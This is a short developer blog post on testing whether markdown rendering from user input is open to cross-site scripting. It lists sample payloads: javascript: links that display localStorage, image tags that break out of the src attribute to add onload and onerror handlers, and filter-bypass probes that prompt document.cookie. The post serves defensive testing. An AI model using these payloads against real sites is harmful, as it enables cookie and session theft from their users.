Testing for XSS in Markdown Fields

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If you render markdown from user input, an attacker might be able to use this to inject javascript code into the source code of your page.
The linked github page is a collection of common markdown XSS payloads which is handy for writing tests.

[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[In Quotes]('javascript:alert("InQuotes")')

Using onload and onerror rendering images:

![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))

Trying to bypass some XSS filters

The site also provides some probes with different encodings and other common tricks to bypass some filters for these payloads in the Fuzzing section.

[XSS](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
[XSS]: (javascript:prompt(document.cookie))
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Posted to makandra dev (2020-07-03 09:03)